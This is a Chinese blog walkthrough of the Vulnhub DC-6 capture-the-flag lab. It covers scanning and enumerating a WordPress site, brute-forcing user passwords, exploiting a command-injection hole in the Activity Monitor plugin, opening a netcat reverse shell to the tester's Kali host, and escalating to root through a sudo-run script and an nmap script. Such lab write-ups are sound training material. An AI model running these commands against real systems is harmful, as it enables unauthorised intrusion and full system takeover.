DC-6-WordPress-nmap提权

Vulnhub简介

Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。

靶场部署

这个挑战的最终目标是获得root权限并阅读唯一的flag
vulnhub官网https://www.vulnhub.com
下载地址https://www.vulnhub.com/entry/dc-6,315/
1、直接从官网下载做好的虚拟机镜像文件(推荐下载Mirror版本);
2、解压会得到一个.ova的文件,然后在VMware中打开即可;

信息收集

靶机官网给出的两个线索
需要去配置一下hosts文件
image.png
Kali里面的密码本
image.png

1.扫描局域网主机

arp-scan -l

image.png

2.端口探测

nmap -sV -p- 192.168.75.158

image.png
可以看到开放了22和80端口
直接访问80端口是不能够解析出来的,我们需要去配置一下hosts文件

Windows系统下在 C:\windows\system32\drivers\etc\hosts
打开后在末尾添加:192.168.75.158 wordy
Linux系统下在/etc/hosts
vim /etc/hosts
#添加
192.168.75.158 wordy

现在访问即可
image.png
是一个WordPress网站,Kali有专门的扫描工具wpscan

3.目录扫描

apt-get install dirsearch
dirsearch -u http://192.168.75.158

image.png

4.wpscan扫描用户

wpscan --url http://wordy/  -e u

找到五个用户
image.png

爆破

1、找到五个用户名:admin、graham、mark、sarah、jens,将用户名放到一个文件里作为用户名,然后再将rockyou.txt里面的带有k01的导出作为密码,进行爆破
(作者在vulnhub上给了个提示,为了减少暴力破解的时间,需要将包含“k01”的字符串从字典里筛选出来作为新字典用)

vim dc-username.txt #将用户名放到其中
gunzip rockyou.txt.gz rockyou.txt #去rockyou.txt.gz所在的目录解压密码本
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc-passwd.txt #将带有k01的密码导到dc-paswd.txt中

2、使用wpscan来爆破

wpscan --url http://wordy/ -U dc-username.txt -P dc-passwd.txt

找到mark的密码为:helpdesk01
image.png
登陆后台
http://wordy/wp-login.php
image.png

后台插件getshell

1、利用Activity monitor插件的rce漏洞来getshell
2、点击Activity monitor -> Tools
image.png
3、执行命令的同时使用burp抓包,发送到repeater模块
前端限制了只能填写15个字符,可以F12修改长度
image.png
image.png
image.png

反弹shell

Kali终端上:nc -lvvp 4444
burp抓包修改为:nc 192.168.75.150 4444 -e /bin/bash

image.png
获取一个稳定一点的shell终端

python -c 'import pty;pty.spawn("/bin/bash")'

image.png

切换用户

在/home/mark/stuff下发现一个文件,记录了用户graham的密码GSo7isUM1D4
image.png
成功切换到graham用户下
image.png

提权

先查看一下有没有suid提权,没有再使用sudo -l看一下可执行的命令
可以看到允许graham用户在不深入jens用户密码的情况下,使用jens身份执行/home/jens/backups.sh这个脚本文件
image.png
查看一下脚本内容

cat /home/jens/backups.sh

我们现在可以执行这个脚本,而且该脚本也在jens的目录下,那可以将/bin/bash写到这个脚本中,再以jens用户来执行这个脚本,那我们就可以获得jens的shell了

echo "/bin/bash" >> backups.sh

image.png
然后以jens用户执行

sudo -u jens ./backups.sh

image.png
已经切换到jens用户
再使用sudo -l查看一下可以执行的操作
image.png
发现是可以使用nmap的root权限,将反弹shell的命令写入到脚本中,然后使用nmap来执行脚本就可以获得root用户的shell了

echo 'os.execute("/bin/bash")' > shell
sudo nmap --script=shell

image.png

知识点总结

  1. 信息收集
  2. wpscan工具的使用,枚举用户名,爆破登录
  3. WordPress插件activity monitor远程代码执行漏洞
  4. nmap提权
posted @ 2024-05-04 21:56  NoCirc1e  阅读(24)  评论(0编辑  收藏  举报